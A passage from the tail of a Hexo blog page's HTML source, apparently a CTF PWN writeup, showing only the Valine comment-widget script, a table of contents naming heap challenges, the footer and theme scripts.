              appId: 'aIJeYmBe1sYhsmeD0Wx4ImDN-MdYXbMMI',
              appKey: 'Gk8i3b8sccXvUCUCkuapvLap',
              meta: ['nick', 'mail', 'link'],
              avatar: 'wavatar',
              enableQQ: true,
              placeholder: '',
              lang: 'en'.toLowerCase()
            }

            if ('https://aijeymbe.api.lncldglobal.com') {
              config.serverURLs = 'https://aijeymbe.api.lncldglobal.com'
            }

            new Valine(config)

            function getAuthor(language) {
              switch (language) {
                case 'en':
                  return 'Author'
                case 'zh-CN':
                  return '博主'
                case 'zh-TW':
                  return '站長'
                default:
                  return 'Master'
              }
            }

            // Add "Author" identify
            const getValineDomTimer = setInterval(() => {
              const vcards = document.querySelectorAll('#vcomments .vcards .vcard')
              if (vcards.length > 0) {
                let author = 'Jsjsj'

                if (author) {
                  for (let vcard of vcards) {
                    const vnick_dom = vcard.querySelector('.vhead .vnick')
                    const vnick = vnick_dom.innerHTML
                    if (vnick === author) {
                      vnick_dom.innerHTML = `${vnick} <span class="author">${getAuthor(KEEP.hexo_config.language)}</span>`
                    }
                  }
                }
                clearInterval(getValineDomTimer)
              } else {
                clearInterval(getValineDomTimer)
              }
            }, 2000)
          }

          if ('false' === 'true') {
            const loadValineTimeout = setTimeout(() => {
              loadValine()
              clearTimeout(loadValineTimeout)
            }, 1000)
          } else {
            window.addEventListener('DOMContentLoaded', loadValine)
          }
        </script>
    </div>


        
    </div>





                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2022-Strong-Network-Mimic-CTF-PWN-writeup"><span class="nav-number">1.</span> <span class="nav-text">2022 Strong Network Mimic CTF PWN writeup</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#webheap"><span class="nav-number">1.1.</span> <span class="nav-text">webheap:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#webheap-revenge"><span class="nav-number">1.2.</span> <span class="nav-text">webheap_revenge:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#This-question-is-an-original-question-of-the-Southwest-Division-Competition-which-directly-uses-the-script-of-Master-Kot-to-type-the-leaked-address-This-question-limits-the-fd-of-read-and-you-can-just-close-it-directly-This-question-comes-out-after-the-game-and-the-complicated-point-is-the-fd-But-close-0-can-change-fd"><span class="nav-number">1.2.1.</span> <span class="nav-text">This question is an original question of the Southwest Division Competition, which directly uses the script of Master Kot to type the leaked address. This question limits the fd of read, and you can just close it directly. This question comes out after the game, and the complicated point is the fd. But close(0) can change fd</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2023
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Jsjsj</a>
                
            </div>

            <div class="theme-info info-item default">
                Powered by&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;&&nbsp;Theme&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2022-Strong-Network-Mimic-CTF-PWN-writeup"><span class="nav-number">1.</span> <span class="nav-text">2022 Strong Network Mimic CTF PWN writeup</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#webheap"><span class="nav-number">1.1.</span> <span class="nav-text">webheap:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#webheap-revenge"><span class="nav-number">1.2.</span> <span class="nav-text">webheap_revenge:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#This-question-is-an-original-question-of-the-Southwest-Division-Competition-which-directly-uses-the-script-of-Master-Kot-to-type-the-leaked-address-This-question-limits-the-fd-of-read-and-you-can-just-close-it-directly-This-question-comes-out-after-the-game-and-the-complicated-point-is-the-fd-But-close-0-can-change-fd"><span class="nav-number">1.2.1.</span> <span class="nav-text">This question is an original question of the Southwest Division Competition, which directly uses the script of Master Kot to type the leaked address. This question limits the fd of read, and you can just close it directly. This question comes out after the game, and the complicated point is the fd. But close(0) can change fd</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local-search -->

    
<script src="/js/local-search.js"></script>



<!-- code-block -->

    
<script src="/js/code-block.js"></script>



<!-- lazyload -->


<div class="">
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- category-page -->
    

    <!-- links-page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
